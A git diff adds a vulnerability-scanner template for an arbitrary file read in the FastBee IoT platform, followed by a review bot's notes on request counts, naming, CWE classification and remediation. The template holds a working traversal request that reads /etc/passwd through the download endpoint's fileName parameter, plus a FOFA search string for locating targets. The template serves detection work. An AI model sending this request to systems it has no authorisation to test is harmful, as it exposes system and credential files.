diff --git a/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml b/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml
new file mode 100644
index 0000000000..56d6a8804e
--- /dev/null
+++ b/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml
@@ -0,0 +1,53 @@
+id: fastbee-arbitrary-file-read
+
+info:
+ name: FastBee - Local File Inclusion
+ author: s4e-io
+ severity: high
+ description: |
+ Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
+ reference:
+ - https://blog.csdn.net/weixin_43167326/article/details/141806542
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: fastbee
+ product: fastbee
+ fofa-query: "fastbee"
+ tags: fastbee,iot,lfi
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body,"FastBee")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+
+ - type: word
+ part: content_type
+ words:
+ - 'application/octet-stream'
+
+ - type: status
+ status:
+ - 200
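Review bot: `max-request: 1` in the `metadata` block undercounts what the template sends, because `flow: http(1) && http(2)` issues the fingerprint request and then the download request; it should read `max-request: 2`. The `name` says "Local File Inclusion" while the id and description describe an arbitrary file read via traversal in `fileName`, so `name: FastBee - Arbitrary File Read` with a `classification:` entry of `cwe-id: CWE-22` would keep triage and reporting consistent. The info block also carries no `remediation:` field; the page does not state a fixed version, so a generic line such as `remediation: Resolve fileName to a canonical path and reject anything outside the intended download directory.` would give operators who get a hit something to act on. The `content_type` word matcher may cause missed detections on deployments that serve the download with a different type, which is worth confirming since the regex and status matchers already pin the result.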